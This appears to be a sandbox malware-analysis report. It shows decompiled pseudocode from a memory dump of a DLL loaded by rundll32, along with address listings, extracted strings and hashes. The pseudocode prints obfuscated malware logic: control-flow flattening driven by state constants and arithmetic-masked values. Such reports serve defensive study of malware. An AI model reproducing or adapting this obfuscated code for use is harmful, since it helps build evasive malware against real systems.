										_push( *(_t1025 + 0xa8));
										_push( *(_t1025 + 0xb4));
										_push( *(_t1025 + 0xc0));
										_t842 = E1000B871(0x100013f8,  *(_t1025 + 0x70), __eflags);
										_t1026 = _t1025 + 0xc;
										E1001BD2C(_t1026 + 0x210, __eflags, _t842,  *((intOrPtr*)(_t1026 + 0xd8)), _t1026 + 0x1a4, _t1026 + 0x4a0,  *((intOrPtr*)(_t1026 + 0x13c)), _t1026 + 0x290, 0x400,  *((intOrPtr*)(_t1026 + 0x148)));
										E1000717B( *((intOrPtr*)(_t1026 + 0x16c)),  *((intOrPtr*)(_t1026 + 0xa0)),  *((intOrPtr*)(_t1026 + 0xf8)), _t842,  *((intOrPtr*)(_t1026 + 0xe8)));
										_t836 =  *((intOrPtr*)(_t1026 + 0x40));
										_t1025 = _t1026 + 0x2c;
										_t911 = 0xbe73cef;
										goto L24;
									} else {
										__eflags = _t911 - 0x2af16eef;
										if(_t911 == 0x2af16eef) {
											E100033F4( *(_t1025 + 0x68),  *(_t1025 + 0x134),  *((intOrPtr*)(_t1025 + 0x5c)),  *(_t1025 + 0x50),  *((intOrPtr*)(_t1025 + 0x174)));
											_t1025 = _t1025 + 0xc;
											_t911 = 0xf036da4;
											goto L11;
										} else {
											__eflags = _t911 - 0x3130de7f;
											if(_t911 == 0x3130de7f) {
												_t1012 = _t1025 + 0x290;
												_t921 = 6;
												_t1023 =  *(_t1025 + 0x154) % _t921 + 1;
												__eflags = _t1023;
												if(__eflags != 0) {
													__eflags = 1;
													do {
														_t1020 = ( *(_t1025 + 0x158) & 0x0000000f) + 4;
														E1000350A( *(_t1025 + 0x90), _t1025 + 0x158, 1, _t1012, _t1020,  *(_t1025 + 0x9c),  *(_t1025 + 0x90));
														_t1025 = _t1025 + 0x14;
														_t1013 = _t1012 + _t1020 * 2;
														_t887 = 0x2f;
														 *_t1013 = _t887;
														_t1012 = _t1013 + 2;
														_t1023 = _t1023 - 1;
														__eflags = _t1023;
													} while (__eflags != 0);
													_t907 =  *((intOrPtr*)(_t1025 + 0x160));
													_t1014 =  *((intOrPtr*)(_t1025 + 0x150));
												}
												_t1021 =  *(_t1025 + 0x158);
												 *_t1012 = 0;
												_t911 = 0x21fbe7a4;
												_t836 =  *((intOrPtr*)(_t1025 + 0x14));
												_t1010 =  *((intOrPtr*)(_t1025 + 0x15c));
												goto L1;
											} else {
												__eflags = _t911 - 0x31a77748;
												if(_t911 != 0x31a77748) {
													goto L46;
												} else {
													_t923 = _t1025 + 0x490;
													 *(_t1025 + 0x164) =  *(_t1025 + 0x164) & 0x00000000;
													 *(_t1025 + 0x168) =  *(_t1025 + 0x8c);
													E10016334(_t923,  *(_t1025 + 0x158),  *((intOrPtr*)(_t1025 + 0x13c)), _t1025 + 0x1a8, _t988, _t1025 + 0x29c,  *(_t1025 + 0x50),  *(_t1025 + 0x154), _t1025 + 0x168, _t1025 + 0x174);
													_t1025 = _t1025 + 0x20;
													asm("sbb ecx, ecx");
													_t911 = (_t923 & 0xdb505f8c) + 0x2af16eef;
													goto L11;
												}
											}
										}
									}
								}
							}
						}
						goto L51;
					}
				}
			}

0x1000bec7
0x1000bece
0x1000bed0
0x1000bed2
0x1000bed9
0x1000bee0
0x1000bee7
0x1000beee
0x1000bef5
0x1000befc
0x1000befd
0x1000befe
0x1000bf03
0x1000bf0e
0x1000bf11
0x1000bf1e
0x1000bf29
0x1000bf2b
0x1000bf36
0x1000bf3b
0x1000bf46
0x1000bf51
0x1000bf5c
0x1000bf67
0x1000bf72
0x1000bf7d
0x1000bf88
0x1000bf93
0x1000bf9e
0x1000bfa6
0x1000bfb1
0x1000bfbc
0x1000bfc7
0x1000bfd2
0x1000bfdd
0x1000bfe8
0x1000bff0
0x1000bffb
0x1000c00a
0x1000c00d
0x1000c014
0x1000c020
0x1000c029
0x1000c02c
0x1000c030
0x1000c038
0x1000c048
0x1000c051
0x1000c052
0x1000c056
0x1000c05b
0x1000c063
0x1000c06b
0x1000c073
0x1000c078
0x1000c080
0x1000c088
0x1000c090
0x1000c09e
0x1000c0a2
0x1000c0aa
0x1000c0b2
0x1000c0bd
0x1000c0ca
0x1000c0d2
0x1000c0dd
0x1000c0e8
0x1000c0f3
0x1000c0fe
0x1000c109
0x1000c114
0x1000c11f
0x1000c12a
0x1000c135
0x1000c140
0x1000c14b
0x1000c156
0x1000c15e
0x1000c169
0x1000c174
0x1000c185
0x1000c18a
0x1000c19b
0x1000c19e
0x1000c1a5
0x1000c1b0
0x1000c1c6
0x1000c1cd
0x1000c1d8
0x1000c1e3
0x1000c1eb
0x1000c1f6
0x1000c201
0x1000c208
0x1000c213
0x1000c226
0x1000c227
0x1000c236
0x1000c23d
0x1000c248
0x1000c253
0x1000c25b
0x1000c263
0x1000c26e
0x1000c279
0x1000c284
0x1000c28f
0x1000c29a
0x1000c2a2
0x1000c2ad
0x1000c2b8
0x1000c2c3
0x1000c2cb
0x1000c2d6
0x1000c2de
0x1000c2e6
0x1000c2ee
0x1000c2f3
0x1000c2fb
0x1000c309
0x1000c30d
0x1000c312
0x1000c317
0x1000c31f
0x1000c327
0x1000c32c
0x1000c334
0x1000c33c
0x1000c344
0x1000c34e
0x1000c356
0x1000c35e
0x1000c366
0x1000c36e
0x1000c382
0x1000c387
0x1000c390
0x1000c39b
0x1000c3a6
0x1000c3b1
0x1000c3bc
0x1000c3c7
0x1000c3cf
0x1000c3db
0x1000c3e0
0x1000c3eb
0x1000c3ec
0x1000c3f0
0x1000c3f8
0x1000c403
0x1000c416
0x1000c41d
0x1000c428
0x1000c433
0x1000c43b
0x1000c446
0x1000c451
0x1000c459
0x1000c461
0x1000c469
0x1000c46e
0x1000c476
0x1000c47e
0x1000c486
0x1000c48e
0x1000c496
0x1000c49e
0x1000c4b1
0x1000c4b8
0x1000c4c3
0x1000c4ce
0x1000c4d9
0x1000c4e4
0x1000c4ec
0x1000c4f7
0x1000c502
0x1000c50d
0x1000c518
0x1000c523
0x1000c52b
0x1000c539
0x1000c53d
0x1000c542
0x1000c54a
0x1000c555
0x1000c55d
0x1000c568
0x1000c573
0x1000c57e
0x1000c589
0x1000c591
0x1000c59c
0x1000c5af
0x1000c5b6
0x1000c5c3
0x1000c5ce
0x1000c5d6
0x1000c5db
0x1000c5e3
0x1000c5eb
0x1000c5f3
0x1000c5fe
0x1000c612
0x1000c617
0x1000c620
0x1000c62b
0x1000c636
0x1000c63e
0x1000c649
0x1000c65c
0x1000c65d
0x1000c664
0x1000c66f
0x1000c67a
0x1000c682
0x1000c68d
0x1000c695
0x1000c69d
0x1000c6a5
0x1000c6aa
0x1000c6b2
0x1000c6bd
0x1000c6c4
0x1000c6cf
0x1000c6da
0x1000c6e5
0x1000c6ed
0x1000c6f8
0x1000c703
0x1000c70e
0x1000c719
0x1000c724
0x1000c738
0x1000c73f
0x1000c74a
0x1000c752
0x1000c757
0x1000c75f
0x1000c764
0x1000c76c
0x1000c777
0x1000c782
0x1000c78d
0x1000c798
0x1000c7a3
0x1000c7ae
0x1000c7b6
0x1000c7bb
0x1000c7c3
0x1000c7cb
0x1000c7d3
0x1000c7db
0x1000c7e5
0x1000c7e9
0x1000c7f1
0x1000c7f9
0x1000c801
0x1000c809
0x1000c811
0x1000c819
0x1000c821
0x1000c829
0x1000c831
0x1000c839
0x1000c841
0x1000c852
0x1000c855
0x1000c861
0x1000c865
0x1000c86a
0x1000c872
0x1000c87a
0x1000c882
0x1000c887
0x1000c88c
0x1000c894
0x1000c8a6
0x1000c8ab
0x1000c8b4
0x1000c8bf
0x1000c8c7
0x1000c8d3
0x1000c8d8
0x1000c8de
0x1000c8e6
0x1000c8ee
0x1000c8fa
0x1000c8ff
0x1000c905
0x1000c911
0x1000c916
0x1000c91c
0x1000c924
0x1000c936
0x1000c939
0x1000c940
0x1000c94b
0x1000c956
0x1000c961
0x1000c974
0x1000c97b
0x1000c986
0x1000c991
0x1000c999
0x1000c9a1
0x1000c9a9
0x1000c9ae
0x1000c9b6
0x1000c9c1
0x1000c9cc
0x1000c9d4
0x1000c9df
0x1000c9ea
0x1000c9f5
0x1000ca00
0x1000ca0b
0x1000ca16
0x1000ca1e
0x1000ca29
0x1000ca34
0x1000ca4a
0x1000ca4f
0x1000ca58
0x1000ca63
0x1000ca6e
0x1000ca7e
0x1000ca7f
0x1000ca83
0x1000ca88
0x1000ca90
0x1000ca9b
0x1000caa6
0x1000cab1
0x1000cabc
0x1000cac4
0x1000cacf
0x1000cada
0x1000cae5
0x1000caf0
0x1000cafb
0x1000cb06
0x1000cb19
0x1000cb20
0x1000cb2b
0x1000cb36
0x1000cb4a
0x1000cb51
0x1000cb5c
0x1000cb63
0x1000cb6a
0x1000cb6e
0x1000cb75
0x1000cb75
0x1000cb75
0x1000cb79
0x1000cb79
0x1000cb79
0x1000cb7f
0x00000000
0x00000000
0x1000cb85
0x1000cb85
0x1000ce56
0x1000ce5b
0x1000ce5e
0x00000000
0x1000cb8b
0x1000cb90
0x1000cb92
0x1000cd76
0x1000cd7c
0x1000d153
0x1000d154
0x1000d15b
0x1000d162
0x1000d169
0x00000000
0x1000cd82
0x1000cd82
0x1000cd88
0x1000cde5
0x1000cdeb
0x1000cdf5
0x1000cdf7
0x1000cdff
0x1000ce01
0x1000ce1d
0x1000ce22
0x1000ce25
0x1000ce29
0x1000ce2b
0x1000d134
0x1000d135
0x1000d13c
0x1000d143
0x1000d14a
0x1000d170
0x1000d170
0x1000ce31
0x1000ce31
0x1000ce36
0x1000ce36
0x00000000
0x1000ce36
0x1000ce2b
0x1000cd8a
0x1000cd8a
0x1000cd90
0x00000000
0x1000cd96
0x1000cda9
0x1000cdb0
0x00000000
0x1000cdb0
0x1000cd90
0x1000cd88
0x1000cb98
0x1000cb98
0x1000cd64
0x1000cd69
0x1000cd6c
0x00000000
0x1000cb9e
0x1000cba4
0x1000cd0b
0x1000cd19
0x1000cd2b
0x1000cd2d
0x1000cd34
0x1000cd35
0x1000cd38
0x00000000
0x1000cbaa
0x1000cbb0
0x1000cc44
0x1000cc4d
0x1000cc54
0x1000cc62
0x1000cc67
0x1000cc6d
0x1000cc8e
0x1000ccb8
0x1000ccbd
0x1000ccd7
0x1000ccdc
0x1000cce1
0x1000cce4
0x1000cceb
0x1000ccf3
0x1000ccf7
0x1000ccfb
0x1000ccff
0x1000ccff
0x00000000
0x1000cbb6
0x1000cbbc
0x1000cc2c
0x1000cc33
0x1000cc34
0x1000cc3c
0x00000000
0x1000cbbe
0x1000cbc4
0x1000d127
0x1000d127
0x1000d12d
0x1000cb75
0x1000cb75
0x1000cb75
0x00000000
0x1000cb75
0x1000cb75
0x1000cbca
0x1000cbee
0x1000cbf5
0x1000cbfa
0x1000cbff
0x1000cc07
0x1000cc0d
0x1000cc0d
0x1000cb75
0x1000cb75
0x1000cb75
0x1000cb79
0x1000cb79
0x1000cb7f
0x00000000
0x00000000
0x00000000
0x1000cb7f
0x1000cb75
0x1000cbc4
0x1000cbbc
0x1000cbb0
0x1000cba4
0x1000cb98
0x1000cb92
0x1000d17a
0x1000d184
0x1000ce68
0x1000ce68
0x1000ce6e
0x1000d0d7
0x1000d0ec
0x1000d102
0x1000d110
0x1000d112
0x1000d11e
0x1000d122
0x00000000
0x1000d114
0x1000d114
0x00000000
0x1000d114
0x1000ce74
0x1000ce74
0x1000ce7a
0x1000d0c8
0x1000d0cd
0x00000000
0x1000ce80
0x1000ce80
0x1000ce86
0x1000d0af
0x1000d0b4
0x1000d0b7
0x00000000
0x1000ce8c
0x1000ce8c
0x1000ce92
0x1000cfeb
0x1000cff7
0x1000cffe
0x1000d009
0x1000d00e
0x1000d054
0x1000d076
0x1000d07b
0x1000d07f
0x1000d082
0x00000000
0x1000ce98
0x1000ce98
0x1000ce9e
0x1000cfd9
0x1000cfde
0x1000cfe1
0x00000000
0x1000cea4
0x1000cea4
0x1000ceaa
0x1000cf37
0x1000cf42
0x1000cf47
0x1000cf47
0x1000cf48
0x1000cf4c
0x1000cf4d
0x1000cf73
0x1000cf79
0x1000cf7e
0x1000cf81
0x1000cf86
0x1000cf87
0x1000cf8a
0x1000cf8d
0x1000cf8d
0x1000cf8d
0x1000cf90
0x1000cf97
0x1000cf97
0x1000cf9e
0x1000cfa7
0x1000cfaa
0x1000cfaf
0x1000cfb3
0x00000000
0x1000ceb0
0x1000ceb0
0x1000ceb6
0x00000000
0x1000cebc
0x1000cec3
0x1000ceca
0x1000ced2
0x1000cf13
0x1000cf18
0x1000cf1d
0x1000cf25
0x00000000
0x1000cf25
0x1000ceb6
0x1000ceaa
0x1000ce9e
0x1000ce92
0x1000ce86
0x1000ce7a
0x00000000
0x1000ce6e
0x1000cb79

Strings

<L, xrefs: 1000C74A
V, xrefs: 1000CAA6
O!, xrefs: 1000C2A2
yB, xrefs: 1000C3F8
O, xrefs: 1000C872
,n, xrefs: 1000C9DF
U4, xrefs: 1000C428
#@, xrefs: 1000C26E
}., xrefs: 1000C0BD
\', xrefs: 1000C591
=H, xrefs: 1000BF7D
WI, xrefs: 1000C080
q;, xrefs: 1000C476
VS, xrefs: 1000C69D
nk@, xrefs: 1000C33C
;&, xrefs: 1000CA58
L, xrefs: 1000C1B0
v%, xrefs: 1000C3BC
p+, xrefs: 1000C23D
M, xrefs: 1000C518
,U, xrefs: 1000C8DE
%J, xrefs: 1000BF03
#b, xrefs: 1000C36E

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: O$#@$#b$%J$,U$,n$;&$<L$=H$O!$U4$VS$WI$nk@$p+$q;$v%$yB$}.$L$M$V$\'
API String ID: 0-3340991546
Opcode ID: d49dc9a40baf2f500299ef955a632644fd4e27c159b00c72e536c16ef7fd1c21
Instruction ID: c9e873ef50927290ca95d91618fa35259dd898a544111064c9b5fa14c3334327
Opcode Fuzzy Hash: d49dc9a40baf2f500299ef955a632644fd4e27c159b00c72e536c16ef7fd1c21
Instruction Fuzzy Hash: 9192F3715083819FE3B8CF61C889B9BBBE1FBC4344F10891DE5DA862A0DBB55959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000F7EF, Relevance: 26.7, Strings: 21, Instructions: 412
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E1000F7EF(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t415;
				void* _t424;
				signed int _t427;
				intOrPtr _t430;
				intOrPtr _t434;
				intOrPtr _t435;
				void* _t474;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				intOrPtr* _t492;
				signed int _t495;
				intOrPtr _t500;
				signed int* _t502;
				void* _t505;

				_t435 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_v32 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(__edx);
				_v16 = 0x3b9680;
				_t434 = 0;
				_v12 = 0x6ba317;
				_t502 =  &(( &_v196)[6]);
				_v8 = 0;
				_v4 = 0;
				_t495 = 0x2719ab8d;
				_v116 = 0xd377;
				_t500 = 0;
				_v116 = _v116 + 0x238d;
				_v116 = _v116 | 0xa2970609;
				_v116 = _v116 ^ 0xa297c99a;
				_v188 = 0x17;
				_t480 = 0x57;
				_v188 = _v188 * 0x6e;
				_v188 = _v188 + 0xffff0dd3;
				_v188 = _v188 << 8;
				_v188 = _v188 ^ 0xff1794f3;
				_v140 = 0x3e07;
				_v140 = _v140 * 0x4c;
				_v140 = _v140 + 0xffff97ee;
				_v140 = _v140 ^ 0x0012480d;
				_v104 = 0xd8e6;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0xecef;
				_v104 = _v104 ^ 0x0d8f715b;
				_v96 = 0x573a;
				_v96 = _v96 + 0x5e68;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0x0000075e;
				_v128 = 0x566c;
				_v128 = _v128 >> 9;
				_v128 = _v128 + 0xffffddf0;
				_v128 = _v128 ^ 0xfffffe2b;
				_v44 = 0xee83;
				_v44 = _v44 | 0x7b89a95f;
				_v44 = _v44 ^ 0x7b89d350;
				_v112 = 0x19ad;
				_v112 = _v112 + 0xa3ec;
				_v112 = _v112 << 9;
				_v112 = _v112 ^ 0x017b186a;
				_v184 = 0x2e78;
				_v184 = _v184 | 0x9e5a38ae;
				_v184 = _v184 + 0xffff0bef;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x3cb2b70a;
				_v136 = 0xcc56;
				_v136 = _v136 ^ 0x8cba8dc2;
				_v136 = _v136 * 0xa;
				_v136 = _v136 ^ 0x7f46992b;
				_v76 = 0x21;
				_v76 = _v76 / _t480;
				_v76 = _v76 ^ 0x00005921;
				_v168 = 0xa72;
				_v168 = _v168 << 0xb;
				_v168 = _v168 ^ 0x98e8c4ea;
				_v168 = _v168 << 7;
				_v168 = _v168 ^ 0x5daa545d;
				_v124 = 0xaec3;
				_v124 = _v124 + 0xffff192a;
				_t481 = 0x5b;
				_v124 = _v124 / _t481;
				_v124 = _v124 ^ 0x02d064ad;
				_v192 = 0x6651;
				_t482 = 0x1d;
				_v192 = _v192 / _t482;
				_t483 = 0x1f;
				_v192 = _v192 * 0x25;
				_v192 = _v192 | 0x9bd6b283;
				_v192 = _v192 ^ 0x9bd6bccf;
				_v88 = 0xd9ca;
				_v88 = _v88 + 0xf892;
				_v88 = _v88 ^ 0x0001ae1d;
				_v120 = 0x6348;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00003c96;
				_v172 = 0xaef9;
				_v172 = _v172 * 0x31;
				_v172 = _v172 * 0x12;
				_v172 = _v172 ^ 0xedb2a137;
				_v172 = _v172 ^ 0xefe82b79;
				_v84 = 0xacfc;
				_v84 = _v84 + 0xffff1368;
				_v84 = _v84 ^ 0xffff9d08;
				_v48 = 0x6e4c;
				_v48 = _v48 / _t483;
				_v48 = _v48 ^ 0x0000060e;
				_v176 = 0xeee3;
				_v176 = _v176 ^ 0x903f1269;
				_v176 = _v176 + 0xffff48ed;
				_v176 = _v176 << 0xf;
				_v176 = _v176 ^ 0xa2bb9fa4;
				_v152 = 0x58ce;
				_v152 = _v152 + 0xffff963f;
				_v152 = _v152 + 0x75c9;
				_v152 = _v152 >> 6;
				_v152 = _v152 ^ 0x000066f7;
				_v56 = 0x6674;
				_v56 = _v56 << 0x10;
				_v56 = _v56 ^ 0x66740fb2;
				_v160 = 0xd031;
				_t484 = 0x28;
				_v160 = _v160 / _t484;
				_v160 = _v160 + 0xffff71b6;
				_v160 = _v160 ^ 0xd9e43e8e;
				_v160 = _v160 ^ 0x261b2d71;
				_v60 = 0x303a;
				_t485 = 0x7d;
				_v60 = _v60 / _t485;
				_v60 = _v60 ^ 0x0000510e;
				_v132 = 0x1d5d;
				_t486 = 0x56;
				_v132 = _v132 / _t486;
				_v132 = _v132 | 0x6e535a32;
				_v132 = _v132 ^ 0x6e5321ef;
				_v80 = 0x7967;
				_v80 = _v80 ^ 0x7560054b;
				_v80 = _v80 ^ 0x75603850;
				_v164 = 0x8cdd;
				_v164 = _v164 + 0xffff8ed4;
				_v164 = _v164 << 0xc;
				_v164 = _v164 ^ 0x828fa879;
				_v164 = _v164 ^ 0x8334cc1e;
				_v52 = 0xa51f;
				_t487 = 0x2e;
				_v52 = _v52 * 0x1c;
				_v52 = _v52 ^ 0x0012379c;
				_v40 = 0x18d2;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0x0c697b49;
				_v144 = 0x15f3;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0xc4cc54f8;
				_v144 = _v144 ^ 0xc4ccfaa5;
				_v196 = 0x22c6;
				_v196 = _v196 | 0x1ab9b1b6;
				_v196 = _v196 << 9;
				_v196 = _v196 / _t487;
				_v196 = _v196 ^ 0x02822d20;
				_v92 = 0x67c;
				_t488 = 0x64;
				_v92 = _v92 / _t488;
				_v92 = _v92 + 0xffff740a;
				_v92 = _v92 ^ 0xffff0769;
				_v64 = 0x1c6a;
				_t489 = 0x41;
				_v64 = _v64 / _t489;
				_v64 = _v64 ^ 0x000016c9;
				_v100 = 0x5f8f;
				_v100 = _v100 ^ 0x595f77d3;
				_v100 = _v100 | 0xb719b4dd;
				_v100 = _v100 ^ 0xff5ff567;
				_v72 = 0x2102;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x00003ab9;
				_v68 = 0xef66;
				_t490 = 0x45;
				_v68 = _v68 / _t490;
				_v68 = _v68 ^ 0x00000379;
				_v156 = 0x2131;
				_v156 = _v156 | 0x611fe25d;
				_t491 = 0x3f;
				_v156 = _v156 / _t491;
				_v156 = _v156 + 0xffff0648;
				_v156 = _v156 ^ 0x0189b07f;
				_v180 = 0xf4b8;
				_v180 = _v180 | 0x619cc8cd;
				_v180 = _v180 * 6;
				_v180 = _v180 + 0xffff3081;
				_v180 = _v180 ^ 0x49ad1e6e;
				_t492 = _v28;
				while(1) {
					L1:
					while(1) {
						_t505 = _t495 - 0x2719ab8d;
						if(_t505 > 0) {
							goto L18;
						}
						L3:
						if(_t505 == 0) {
							_t495 = 0x3321e816;
							continue;
						} else {
							if(_t495 == _t474) {
								E10008114(_v48,  &_v20, _v176, _t435, _v68, _v152, _t500, _v56, _v36);
								_t495 =  !=  ? 0x2d69547a : 0x2669c161;
								_t415 = E1001EF5D(_v160, _v60, _v36, _v132);
								_t502 =  &(_t502[9]);
								L27:
								_t435 = _v148;
								_t474 = 0x252cad7;
								goto L28;
							} else {
								if(_t495 == 0x11388fe4) {
									return E100033F4(_v92, _v64, _v100, _v72, _t434);
								}
								if(_t495 == 0x122b2781) {
									_push(_t435);
									_t500 = E1000A0AD(0x2000, _t474);
									_t495 =  !=  ? 0x132b3d3f : 0x11388fe4;
									goto L14;
								} else {
									if(_t495 == 0x132b3d3f) {
										_t424 = E100161AD( &_v24, _v96, _v128, _t435, _v44, _t435, _v32, _v112, _t435, _v184,  &_v28, _v136, _t434, _t435, _v76, _t435, _v168, _v124, _v192);
										_t502 =  &(_t502[0x12]);
										if(_t424 == 0) {
											_t495 = 0x363e2349;
											L14:
											_t415 = _v108;
										} else {
											_t427 = E10013B73();
											_t495 = 0x2dd7ef02;
											_t415 = _v28 * 0x2c + _t434;
											_v108 = _t415;
											_t492 =  >=  ? _t434 : (_t427 & 0x0000001f) * 0x2c + _t434;
										}
										_t435 = _v148;
										goto L1;
									} else {
										if(_t495 != 0x2669c161) {
											L28:
											if(_t495 != 0x323b38fa) {
												_t415 = _v108;
												continue;
											}
										} else {
											_t492 = _t492 + 0x2c;
											asm("sbb esi, esi");
											_t495 = (_t495 & 0xf799cbb9) + 0x363e2349;
											while(1) {
												_t505 = _t495 - 0x2719ab8d;
												if(_t505 > 0) {
													goto L18;
												}
												goto L3;
											}
											goto L18;
										}
									}
								}
							}
						}
						L31:
						return _t415;
						L18:
						_t415 = 0x2d69547a;
						if(_t495 == 0x2d69547a) {
							_t415 = E10019BD1(_v156, _v80, _v164, _t435, _t500);
							_t502 =  &(_t502[3]);
							_t495 = 0x363e2349;
							goto L27;
						} else {
							if(_t495 == 0x2dd7ef02) {
								_t430 = E10014FA1( *_t492, _v172, _v180, _v32, _v84);
								_t435 = _v148;
								_t502 =  &(_t502[3]);
								_v36 = _t430;
								_t415 = _v108;
								_t474 = 0x252cad7;
								_t495 =  !=  ? 0x252cad7 : 0x2669c161;
								continue;
							} else {
								if(_t495 == 0x3321e816) {
									_push(_t435);
									_t415 = E1000A0AD(0x20000, _t474);
									_t434 = 0x2d69547a;
									if(0x2d69547a != 0) {
										_t495 = 0x122b2781;
										goto L14;
									}
								} else {
									if(_t495 != 0x363e2349) {
										goto L28;
									} else {
										E100033F4(_v52, _v40, _v144, _v196, _t500);
										_t502 =  &(_t502[3]);
										_t495 = 0x11388fe4;
										goto L14;
									}
								}
							}
						}
						goto L31;
					}
				}
			}

0x1000f7ef
0x1000f7f9
0x1000f802
0x1000f806
0x1000f80d
0x1000f814
0x1000f81b
0x1000f822
0x1000f823
0x1000f824
0x1000f829
0x1000f834
0x1000f836
0x1000f841
0x1000f844
0x1000f84d
0x1000f854
0x1000f859
0x1000f861
0x1000f863
0x1000f86b
0x1000f873
0x1000f87b
0x1000f88a
0x1000f88b
0x1000f88f
0x1000f897
0x1000f89c
0x1000f8a4
0x1000f8b1
0x1000f8b5
0x1000f8bd
0x1000f8c5
0x1000f8cd
0x1000f8d2
0x1000f8da
0x1000f8e2
0x1000f8ea
0x1000f8f2
0x1000f8f7
0x1000f8ff
0x1000f907
0x1000f90c
0x1000f914
0x1000f91c
0x1000f927
0x1000f932
0x1000f93d
0x1000f945
0x1000f94d
0x1000f952
0x1000f95a
0x1000f962
0x1000f96a
0x1000f972
0x1000f976
0x1000f97e
0x1000f986
0x1000f993
0x1000f997
0x1000f99f
0x1000f9b3
0x1000f9ba
0x1000f9c5
0x1000f9cd
0x1000f9d2
0x1000f9da
0x1000f9df
0x1000f9e7
0x1000f9ef
0x1000f9ff
0x1000fa04
0x1000fa0a
0x1000fa12
0x1000fa1e
0x1000fa23
0x1000fa2e
0x1000fa31
0x1000fa35
0x1000fa3d
0x1000fa45
0x1000fa50
0x1000fa5b
0x1000fa66
0x1000fa6e
0x1000fa7b
0x1000fa83
0x1000fa90
0x1000fa99
0x1000fa9d
0x1000faa5
0x1000faad
0x1000fab8
0x1000fac3
0x1000face
0x1000fae4
0x1000faeb
0x1000faf6
0x1000fafe
0x1000fb06
0x1000fb0e
0x1000fb13
0x1000fb1b
0x1000fb23
0x1000fb2b
0x1000fb33
0x1000fb38
0x1000fb40
0x1000fb4b
0x1000fb53
0x1000fb5e
0x1000fb6a
0x1000fb6f
0x1000fb75
0x1000fb7d
0x1000fb85
0x1000fb8d
0x1000fb9f
0x1000fba4
0x1000fbad
0x1000fbb8
0x1000fbc4
0x1000fbc7
0x1000fbcd
0x1000fbd5
0x1000fbdd
0x1000fbe8
0x1000fbf3
0x1000fbfe
0x1000fc06
0x1000fc0e
0x1000fc13
0x1000fc1b
0x1000fc23
0x1000fc38
0x1000fc3b
0x1000fc42
0x1000fc4d
0x1000fc58
0x1000fc60
0x1000fc6b
0x1000fc73
0x1000fc78
0x1000fc80
0x1000fc88
0x1000fc90
0x1000fc98
0x1000fca5
0x1000fca9
0x1000fcb1
0x1000fcbd
0x1000fcc2
0x1000fcc8
0x1000fcd0
0x1000fcd8
0x1000fcea
0x1000fcef
0x1000fcf8
0x1000fd03
0x1000fd0b
0x1000fd13
0x1000fd1b
0x1000fd23
0x1000fd2e
0x1000fd36
0x1000fd41
0x1000fd53
0x1000fd58
0x1000fd61
0x1000fd6c
0x1000fd74
0x1000fd80
0x1000fd83
0x1000fd87
0x1000fd8f
0x1000fd97
0x1000fd9f
0x1000fdac
0x1000fdb0
0x1000fdb8
0x1000fdc0
0x1000fdcb
0x1000fdcb
0x1000fdd0
0x1000fdd0
0x1000fdd6
0x00000000
0x00000000
0x1000fddc
0x1000fddc
0x1000ff56
0x00000000
0x1000fde2
0x1000fde4
0x1000ff1f
0x1000ff46
0x1000ff49
0x1000ff4e
0x1001003b
0x1001003b
0x1001003f
0x00000000
0x1000fdea
0x1000fdf0
0x00000000
0x10010074
0x1000fdfc
0x1000fed3
0x1000fede
0x1000feed
0x00000000
0x1000fe02
0x1000fe08
0x1000fe7e
0x1000fe83
0x1000fe88
0x1000fec0
0x1000fec5
0x1000fec5
0x1000fe8a
0x1000fe92
0x1000fe9a
0x1000feac
0x1000feb0
0x1000feb4
0x1000feb4
0x1000feb7
0x00000000
0x1000fe0a
0x1000fe10
0x10010044
0x1001004a
0x1001004c
0x00000000
0x1001004c
0x1000fe16
0x1000fe16
0x1000fe1b
0x1000fe23
0x1000fdd0
0x1000fdd0
0x1000fdd6
0x00000000
0x00000000
0x00000000
0x1000fdd6
0x00000000
0x1000fdd0
0x1000fe10
0x1000fe08
0x1000fdfc
0x1000fde4
0x10010081
0x10010081
0x1000ff60
0x1000ff60
0x1000ff67
0x1001002e
0x10010033
0x10010036
0x00000000
0x1000ff6d
0x1000ff73
0x1000fff2
0x1000fff7
0x1000fffb
0x10010000
0x10010007
0x10010010
0x10010015
0x00000000
0x1000ff75
0x1000ff7b
0x1000ffba
0x1000ffc0
0x1000ffc5
0x1000ffca
0x1000ffd0
0x00000000
0x1000ffd0
0x1000ff7d
0x1000ff83
0x00000000
